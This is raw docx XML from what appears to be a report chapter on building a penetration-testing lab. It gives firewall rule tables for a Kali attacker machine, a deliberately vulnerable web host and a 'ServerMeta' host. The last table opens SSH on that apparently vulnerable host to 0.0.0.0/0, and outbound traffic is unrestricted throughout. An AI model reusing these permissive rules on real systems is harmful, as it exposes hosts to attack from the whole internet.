          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ali </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>achine</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097"/>
        <w:gridCol w:w="2099"/>
        <w:gridCol w:w="2149"/>
        <w:gridCol w:w="2148"/>
      </w:tblGrid>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="28B19E85" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7578FA04" w14:textId="0C84C80A"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1C5F5E" w14:textId="2DC2A7E1"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048372FE" w14:textId="72CD6E69"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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41DF2595" w14:textId="6FB765CE"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Security_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="2E310090" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F36E8EE" w14:textId="14C38FDB"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2892EBEC" w14:textId="01D8C4B3"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27718125" w14:textId="5C39B0ED"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48743C10" w14:textId="0A516B23"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SG_Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35071A7F" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="007536B4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4D304E" w14:textId="484C5FE1" w:rsidR="00BC5711" w:rsidRPr="00D77DFE" w:rsidRDefault="00BC5711" w:rsidP="007536B4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Outbound rules are required to permit the Kali machine to transmit traffic across all subnets and to external networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456FF5BC" w14:textId="7F0A5C39" w:rsidR="007536B4" w:rsidRPr="00D77DFE" w:rsidRDefault="007536B4" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The inbound rules for Vulnweb machine </w:t>
      </w:r>
      <w:r w:rsidR="00087E54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shown in Table 4.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56198EDA" w14:textId="3C7755A1" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="003F32CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.14: </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ules for </w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnWeb </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">achine in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ubnet_2</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073"/>
        <w:gridCol w:w="2072"/>
        <w:gridCol w:w="2197"/>
        <w:gridCol w:w="2151"/>
      </w:tblGrid>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="58C3B27C" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6834B19A" w14:textId="0E3216C7"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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488E49EB" w14:textId="484FB88A"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97" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15B6A892" w14:textId="3415198E"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B6DA79B" w14:textId="0451B13A"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Security group </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="1145A800" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66A31C55" w14:textId="627BCEED"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A82C831" w14:textId="3AE19241"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2646B514" w14:textId="1FC239DE"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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="019D795D" w14:textId="5F0D73FF"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SG_Web_App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="4C6D4D74" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="384AB8DB" w14:textId="6B8AC43E"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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25A27906" w14:textId="0961EEEB"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ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650993AC" w14:textId="241C0E02"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10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B732C0A" w14:textId="1684D601"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SG_Web_App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="77D8FB08" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18414278" w14:textId="6F87D470"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0-65535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A9FBB94" w14:textId="693129C7"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7CEBE944" w14:textId="4055230D"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10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0160C101" w14:textId="37FD9451" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="00176715"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w:t>
            </w:r>
            <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>G_Web_App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="55E7401C" w14:textId="77777777" w:rsidTr="00095180">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A236089" w14:textId="6CC8F1FD"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8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A3B4C1A" w14:textId="0AA4EE3E"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6FE33D3C" w14:textId="63F3133E" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="00095180"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Public_IP_of_Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB1250C" w14:textId="162FA8EA" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="00176715"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w:t>
            </w:r>
            <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>G_Web_App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ECAF7BC" w14:textId="77777777" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="00095180" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EC466F" w14:textId="3D6FE968" w:rsidR="00087E54" w:rsidRPr="00D77DFE" w:rsidRDefault="00866217" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The VulnWeb host runs a vulnerable web application</w:t>
      </w:r>
      <w:r w:rsidR="00B3299B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that could enable unauthorized access through multiple </w:t>
      </w:r>
      <w:r w:rsidR="00CC5E2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00B3299B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">; therefore, it is restricted so only the tester can reach it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49799951" w14:textId="77777777" w:rsidR="00155319" w:rsidRDefault="00155319" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7971E8E6" w14:textId="6967AD8B" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00B3299B" w:rsidP="00155319">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSH (TCP 22) remains enabled to permit standard configuration and administration.</w:t>
      </w:r>
      <w:r w:rsidR="00087E54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> The outbound rules for VulnWeb machine are shown in Table 4.15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB1155" w14:textId="491CE25F" w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 4.15:</w:t>
      </w:r>
      <w:r w:rsidR="00D42CD4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ules for the VulnWeb </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>achine</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075"/>
        <w:gridCol w:w="2078"/>
        <w:gridCol w:w="2134"/>
        <w:gridCol w:w="2206"/>
      </w:tblGrid>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="75D515CA" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D242F7D"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703ED0A2"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34D6CB5E"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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F449A02"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Security_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00095180" w:rsidRPr="00D77DFE" w14:paraId="01C0D3E9" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB1E923"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664995D7"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300646CD" w14:textId="77777777"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD6FD50" w14:textId="2E4E207F" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="00095180"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SG_</w:t>
            </w:r>
            <w:r w:rsidR="00D52B3B" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web_App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AFD59EE" w14:textId="77777777" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="008478B2" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC6105C" w14:textId="4457BCF8" w:rsidR="00087E54" w:rsidRPr="00D77DFE" w:rsidRDefault="00D10649" w:rsidP="00155319">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>For similar reasons on Kali machine, such configuration in outbound rules is needed to permit the VulnWeb machine to transmit traffic across all subnets and to external networks.</w:t>
      </w:r>
      <w:r w:rsidR="00317F9F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00087E54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The inbound rules for ServerMeta are shown in Table 4.16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389FB945" w14:textId="74252B07" w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w:rsidRDefault="000F5337" w:rsidP="00087E54">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 4.16: Inbound Rules for ServerMeta (Subnet 3)</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076"/>
        <w:gridCol w:w="2076"/>
        <w:gridCol w:w="2199"/>
        <w:gridCol w:w="2142"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w14:paraId="73BD6B2D" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="629361DC"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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B1E0DF0"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97" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0981EF"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16CA8E2F" w14:textId="608DFB0E"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Security </w:t>
            </w:r>
            <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">roup </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w14:paraId="3B33B549" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C58FD7" w14:textId="088A6F0F"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0-65535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A2BF38F"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332BA797" w14:textId="77BA0EA2"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10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CC92240" w14:textId="7D9C8921" w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w:rsidRDefault="00482D79"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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w14:paraId="49D7CF86" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49BE88A9"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38" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D8D9EC0"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ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D10000C" w14:textId="3476B5AB"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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DE8D19" w14:textId="4DDC8581" w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w:rsidRDefault="00482D79"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Launch_wizard_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9127C" w:rsidRPr="00D77DFE" w14:paraId="3438A960" w14:textId="77777777" w:rsidTr="00087E54">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2236" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7741208B" w14:textId="69A62811"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188A5EAC"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0F5EAECD" w14:textId="41E537A8"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0.0.0.0/</w:t>
            </w:r>
            <w:r w:rsidR="00427F79" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
